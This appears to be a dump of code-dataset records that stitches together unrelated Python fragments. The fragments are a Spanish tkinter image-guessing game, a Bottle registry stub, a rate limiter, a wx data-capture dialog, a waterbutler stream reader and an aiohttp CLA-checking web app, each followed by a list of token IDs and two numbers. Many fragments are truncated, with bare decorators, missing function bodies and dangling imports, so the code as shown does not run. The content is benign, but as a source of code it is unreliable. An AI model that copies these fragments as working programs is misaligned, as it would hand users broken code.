    """Center a tkinter window on the screen.

    :param win: the root or Toplevel window to center
    """
    # Make sure the geometry information is up to date before measuring.
    win.update_idletasks()
    inner_w = win.winfo_width()
    inner_h = win.winfo_height()
    # Border width and title-bar height added by the window manager.
    border = win.winfo_rootx() - win.winfo_x()
    titlebar = win.winfo_rooty() - win.winfo_y()
    # Full outer size of the decorated window.
    outer_w = inner_w + 2 * border
    outer_h = inner_h + titlebar + border
    # Top-left corner that puts the decorated window in the screen's middle.
    pos_x = win.winfo_screenwidth() // 2 - outer_w // 2
    pos_y = win.winfo_screenheight() // 2 - outer_h // 2
    win.geometry('{}x{}+{}+{}'.format(inner_w, inner_h, pos_x, pos_y))
    win.deiconify()
# USER INTERFACE
hidden = False
ventana = Tk()  # main application window
# Background image covering the whole window.
imh12 = PhotoImage(file="azules.png")
fo = Label(ventana, image=imh12, width=980, height=675)
fo.image=imh12  # keep a reference so the image is not garbage-collected
fo.place(x=0, y=0)
# Tk variables backing the form fields.
genero = StringVar()
titulo = StringVar()
descripcion = StringVar()
duracion = StringVar()
anio = StringVar()
conteliminar = StringVar()
# Color palette for the whole UI.
colorFondo = "orange"
colorLetra = "BLACK"
colorBotones = "SpringGreen3"
ventana.title("Image Play")
ventana.geometry("770x675")
ventana.configure(background = colorFondo)
# NOTE(review): Widget(...).place(...) returns None, so names assigned this
# way hold None, not the widget. The callbacks referenced below (chose,
# finalizar, iniciar, probar, autores) are defined elsewhere in this file.
etiquetaTitulo= Label(ventana, text=" Aquí se muestra una pista de la Palabrita",
                      bg="teal", fg=colorFondo,width=38,font=("", "14")).place(x=20,y=10)
etiquetajug = Label(ventana, text="NOMBRE DEL JUGADOR", bg=colorFondo,
                    fg=colorLetra,width=40, height=1).place(x=450, y=210)
# ----> player name entry
cajaju = Entry(ventana, width=47)
cajaju.place(x=450, y=240)
botonInIma = Button(ventana, text="INSERTAR UNA IMAGEN DE TU PC", command=chose, bg=colorBotones, width=39, height=1,
                    fg=colorLetra).place(x=450, y=60)
etiquetaT1 = Label(ventana, text="NOMBRE DE LA IMAGEN", bg=colorFondo,
                   fg=colorLetra,width=40, height=1).place(x=450, y=90)
# ----> image name entry
# NOTE(review): 'global' at module scope is a no-op.
global cajanombre
cajanombre = Entry(ventana, width=47)
cajanombre.place(x=450, y=120)
etiquetaT2 = Label(ventana, text="DESCRIPCIÓN DE LA IMAGEN", bg=colorFondo,
                   fg=colorLetra,width=40, height=1).place(x=450, y=150)
# ----> image description entry
cajadescripcion = Entry(ventana, width=47 )
cajadescripcion.place(x=450, y=180)
etiquetaQUE = Label(ventana, text="¿QUE SE DEBE HACER?", bg=colorFondo,
                    fg=colorLetra,width=40, height=1).place(x=450, y=290)
# Basic how-to-play help box: read-only text with two scrollbars.
txtFrameinstruc = Frame(ventana, borderwidth=1, relief="sunken")
txtinstruc = Text(txtFrameinstruc, wrap = NONE, height = 4, width = 34, borderwidth=1)
vscroll = Scrollbar(txtFrameinstruc, orient=HORIZONTAL, command=txtinstruc.xview)
vscroll01 = Scrollbar(txtFrameinstruc, orient=VERTICAL, command=txtinstruc.yview)
txtinstruc['xscrollcommand'] = vscroll.set
txtinstruc['yscrollcommand'] = vscroll01.set
vscroll.pack(side="bottom", fill="x")
vscroll01.pack(side="right", fill="y")
txtinstruc.pack(side="left", fill="both", expand=True)
txtinstruc.insert(INSERT, "Complete en la parte de abajo el nombre :)\nde la imagen correspondiente para que así vaya\ndestapando la imagen poco a poco :) :) \n\n")
txtFrameinstruc.place(x=450, y=330)
txtinstruc.tag_add("here", "1.0", "7.4")
txtinstruc.tag_add("start", "1.8", "1.13")
txtinstruc.tag_config("here", background="black", foreground="white")
txtinstruc.config(state=DISABLED)  # make the help text read-only
# Reference kept (no chained .place) so the label can be configured later.
etiquetaT3 = Label(ventana, text="DESCRIPCIÓN DE LA IMAGEN: ", bg=colorFondo,
                   fg=colorLetra,width=40, height=1)
etiquetaT3.place(x=450, y=430)
# Image description / guess section.
etiquetaT4 = Label(ventana, text="ADIVINA: ", bg=colorFondo,
                   fg=colorLetra,width=40, height=1).place(x=450, y=530)
cajares = Entry(ventana, width=47)
cajares.place(x=450, y=560)
# GUESS-THE-WORD action buttons.
botoFinaliza = Button(ventana, text="FINALIZAR", bg=colorBotones,width=17, height=1,
                      fg=colorLetra,command=finalizar).place(x=610, y=650)
botoIntentar = Button(ventana, text="INICIAR JUEGO", bg=colorBotones,width=20, height=1,
                      fg=colorLetra,command=iniciar).place(x=450, y=650)
botonprobar = Button(ventana, text="PROBAR PALABRA INGRESADA", command=probar, bg=colorBotones,width=40, height=1,
                     fg=colorLetra).place(x=450, y=588)
botonautores = Button(ventana, text="AUTORES", command=autores, bg=colorBotones,width=40, height=1,
                      fg=colorLetra).place(x=450, y=615)
# IMAGE REPLACEMENT area
label_principal=Label(ventana,width=60,height=70)
label_principal.place(x=20,y=60)
label_principal.pack  # NOTE(review): missing parentheses — this line is a no-op
#imh = PhotoImage(file="descarga.png")
# Timer display.
cron = Label(ventana, text="Time:",
             fg=colorFondo,font=("", "18")).place(x=590, y=10)
# NOTE(review): this assignment shadows the imported 'time' module from here on.
time = Label(ventana, fg='red', width=5, font=("", "18"))
time.place(x=660, y=10)
# Placeholder images: the main picture and, presumably, the five tiles that
# cover it during the game (see the help text above) — confirm.
im=PhotoImage(file="nula.png")
w = Label(ventana,image=im, width=423, height=610)
w.place(x=20, y=60)
im1 = PhotoImage(file="nula.png")
etiqueta1 = Label(ventana, image=im1, width=225, height=200)
etiqueta2 = Label(ventana, image=im1, width=225, height=205)
etiqueta3 = Label(ventana, image=im1, width=200, height=200)
etiqueta4 = Label(ventana, image=im1, width=200, height=200)
etiqueta5 = Label(ventana, image=im1, width=225, height=205)
# this removes the maximize button
ventana.resizable(0,0)
center(ventana)
mainloop()
| [
6738,
1233,
26791,
1330,
3141,
198,
6738,
256,
74,
3849,
1330,
1635,
198,
11748,
640,
198,
11748,
48951,
49443,
198,
11748,
16092,
418,
198,
11748,
28686,
198,
11748,
4423,
346,
198,
6738,
256,
74,
3849,
1330,
3275,
3524,
198,
6738,
256... | 2.311076 | 2,546 |
from bottle import route, run, request, static_file, Bottle, response
import hash_ring
import sys, getopt
import yaml
import os
import requests
import json
from argparse import ArgumentParser
from optparse import OptionParser
import time
import socket
import random
from multiprocessing import Process, Queue
from dxf import *
import rejson, redis, json
# Bottle WSGI application instance for this registry service.
app = Bottle()
# Logical database numbers (presumably Redis DB indices — confirm): blobs,
# file metadata, and blob-file recipes live in separate databases.
dbNoBlob = 0
dbNoFile = 1
dbNoBFRecipe = 2
####
# NANNAN: tar the blobs and send back to master.
# maybe ignore.
####
##
# NANNAN: fetch the serverips from redis by using layer digest
##
################################
# NANNAN: forward to registries according to cht
################################
@app.route('/up', method="POST")
if __name__ == "__main__":
    # Script entry point; main() is presumably defined later in this file
    # — confirm.
    main()
| [
6738,
9294,
1330,
6339,
11,
1057,
11,
2581,
11,
9037,
62,
7753,
11,
33608,
11,
2882,
198,
11748,
12234,
62,
1806,
198,
11748,
25064,
11,
651,
8738,
198,
11748,
331,
43695,
198,
11748,
28686,
198,
11748,
7007,
198,
11748,
33918,
198,
6... | 3.294872 | 234 |
"""Handlers that modify and/or filter requests."""
# Public API of this module.
__all__ = [
    'RateLimiter',
]
import logging
import math
import time
from g1.bases import collections as g1_collections
from g1.bases.assertions import ASSERT
from .. import consts
from .. import wsgi_apps
# Module-level logger, named after the module for hierarchical filtering.
LOG = logging.getLogger(__name__)
class RateLimiter:
"""Rate limiter.
When a request arrives, the rate limiter calculates its bucket key
and retrieves (or creates) its corresponding bucket. Then it will
let pass or drop the request depending on the token bucket state.
* The rate limiter can hold at most `num_buckets` token buckets, and
will drop buckets when this number is exceeded.
* By default, all requests needs one token, which can be overridden
with `get_num_needed` callback.
"""
| [
37811,
12885,
8116,
326,
13096,
290,
14,
273,
8106,
7007,
526,
15931,
198,
198,
834,
439,
834,
796,
685,
198,
220,
220,
220,
705,
32184,
19352,
2676,
3256,
198,
60,
198,
198,
11748,
18931,
198,
11748,
10688,
198,
11748,
640,
198,
198,... | 3.233871 | 248 |
from datetime import datetime
import gameball.utils | [
6738,
4818,
8079,
1330,
4818,
8079,
198,
11748,
983,
1894,
13,
26791
] | 4.25 | 12 |
import csv
from datetime import timedelta
from functools import partial
import os
from pubsub import pub
from threading import Lock, Thread
from time import localtime, sleep, time
import wx
from wx.lib.filebrowsebutton import DirBrowseButton
from spacq.interface.pulse.parser import PulseError
from spacq.interface.units import IncompatibleDimensions
from spacq.iteration.sweep import PulseConfiguration, SweepController
from spacq.iteration.variables import sort_output_variables, sort_condition_variables, InputVariable, OutputVariable, ConditionVariable
from spacq.tool.box import flatten, sift
from ..tool.box import Dialog, MessageDialog, YesNoQuestionDialog
class DataCaptureDialog(Dialog, SweepController):
    """
    A progress dialog which runs over iterators, sets the corresponding resources, and captures the measured data.
    """
    # Truncate displayed values so long readings do not distort the dialog.
    max_value_len = 50 # characters
    # Period of the GUI refresh timer.
    timer_delay = 50 # ms
    # Grace period before a non-progressing sweep is considered stalled.
    stall_time = 2 # s
    # Human-readable label shown for each SweepController state.
    status_messages = {
        None: 'Starting up',
        'init': 'Initializing',
        'next': 'Getting next values',
        'transition': 'Smooth setting',
        'write': 'Writing to devices',
        'dwell': 'Waiting for resources to settle',
        'pulse': 'Running pulse program',
        'read': 'Taking measurements',
        'condition': 'Testing conditions',
        'condition_dwell': 'Waiting for conditions to settle',
        'ramp_down': 'Smooth setting',
        'end': 'Finishing',
    }
    def _general_exception_handler(self, f, e):
        """
        Called when a trampolined function raises e.

        f: the function (or its name) that raised — shown in the dialog title.
        """
        MessageDialog(self.parent, '{0}'.format(str(e)), 'Sweep error in "{0}"'.format(f)).Show()
    def _resource_exception_handler(self, resource_name, e, write=True):
        """
        Called when a write to or read from a Resource raises e.

        write: True when the failure happened while writing to the resource,
        False when it happened while reading from it.
        """
        msg = 'Resource: {0}\nError: {1}'.format(resource_name, str(e))
        # NOTE(review): 'dir' shadows the builtin of the same name.
        dir = 'writing to' if write else 'reading from'
        MessageDialog(self.parent, msg, 'Error {0} resource'.format(dir)).Show()
        # Only a failed write aborts fatally; a failed read lets the sweep
        # wind down.
        self.abort(fatal=write)
class DataCapturePanel(wx.Panel):
"""
A panel to start the data capture process, optionally exporting the results to a file.
"""
| [
11748,
269,
21370,
198,
6738,
4818,
8079,
1330,
28805,
12514,
198,
6738,
1257,
310,
10141,
1330,
13027,
198,
11748,
28686,
198,
6738,
2240,
7266,
1330,
2240,
198,
6738,
4704,
278,
1330,
13656,
11,
14122,
198,
6738,
640,
1330,
1957,
2435,
... | 3.22327 | 636 |
import os
import asyncio
import agent
from waterbutler.core.streams.base import BaseStream
class PartialFileStreamReader(FileStreamReader):
"""Awful class, used to avoid messing with FileStreamReader. Extends FSR with start and end
byte offsets to indicate a byte range of the file to return. Reading from this stream will
only return the requested range, never data outside of it.
"""
@property
@property
@property
@property
@agent.async_generator
| [
11748,
28686,
198,
11748,
30351,
952,
198,
198,
11748,
5797,
198,
198,
6738,
1660,
4360,
1754,
13,
7295,
13,
5532,
82,
13,
8692,
1330,
7308,
12124,
628,
198,
198,
4871,
43689,
8979,
12124,
33634,
7,
8979,
12124,
33634,
2599,
198,
220,
... | 3.380952 | 147 |
import os
import aiohttp
import aiohttp_jinja2
import jinja2
from aiohttp import web
from gidgethub.aiohttp import GitHubAPI
from check_python_cla.bpo import Status, check_cla
from check_python_cla.exceptions import CheckCLAException
from check_python_cla.github import get_and_update_pending_prs
@web.middleware
async def error_middleware(request, handler):
    """Middleware that renders HTTP errors using the ``error.html`` template."""
    try:
        return await handler(request)
    except web.HTTPException as ex:
        # Prefer the exception's body text; fall back to the status reason.
        message = ex.text if ex.text else ex.reason
        return aiohttp_jinja2.render_template(
            "error.html",
            request,
            context={"error_message": message, "status": ex.status},
        )
async def handle_get(request):
    """Render the landing page: a username textbox and a submit button."""
    return aiohttp_jinja2.render_template("index.html", request, context={})
async def handle_post(request):
    """Check if the user has signed the CLA.

    If the user has signed the CLA and open PRs still carry the
    `CLA not signed` label, remove the label and list those PRs.
    Otherwise, just display a page saying whether the user has signed
    the CLA or not.
    """
    form = await request.post()
    gh_username = form.get("gh_username", "").strip()
    template = "index.html"
    context = {}
    if gh_username:
        async with aiohttp.ClientSession() as session:
            try:
                cla_result = await check_cla(session, gh_username)
            except CheckCLAException as e:
                context = {"error_message": e}
            else:
                context = {"gh_username": gh_username, "cla_result": cla_result}
                if cla_result == Status.signed.value:
                    # CLA is signed: clear the stale label from any open PRs.
                    gh = GitHubAPI(
                        session,
                        "python/cpython",
                        oauth_token=os.environ.get("GH_AUTH"),
                    )
                    pending_prs = await get_and_update_pending_prs(gh, gh_username)
                    if pending_prs:
                        template = "pull_requests.html"
                        context["pull_requests"] = pending_prs
    return aiohttp_jinja2.render_template(template, request, context=context)
if __name__ == "__main__":  # pragma: no cover
    app = web.Application(middlewares=[error_middleware])
    # Templates are loaded from ./templates relative to the working directory.
    aiohttp_jinja2.setup(
        app, loader=jinja2.FileSystemLoader(os.path.join(os.getcwd(), "templates"))
    )
    app["static_root_url"] = os.path.join(os.getcwd(), "static")
    # PaaS-style deployment: the hosting platform provides the port via $PORT.
    port = os.environ.get("PORT")
    if port is not None:
        port = int(port)
    app.add_routes(
        [
            web.get("/", handle_get),
            web.post("/", handle_post),
            web.static("/static", os.path.join(os.getcwd(), "static")),
        ]
    )
    # port=None lets aiohttp fall back to its default port.
    web.run_app(app, port=port)
| [
11748,
28686,
198,
198,
11748,
257,
952,
4023,
198,
11748,
257,
952,
4023,
62,
18594,
6592,
17,
198,
11748,
474,
259,
6592,
17,
198,
6738,
257,
952,
4023,
1330,
3992,
198,
6738,
308,
17484,
40140,
13,
64,
952,
4023,
1330,
21722,
17614... | 2.311668 | 1,277 |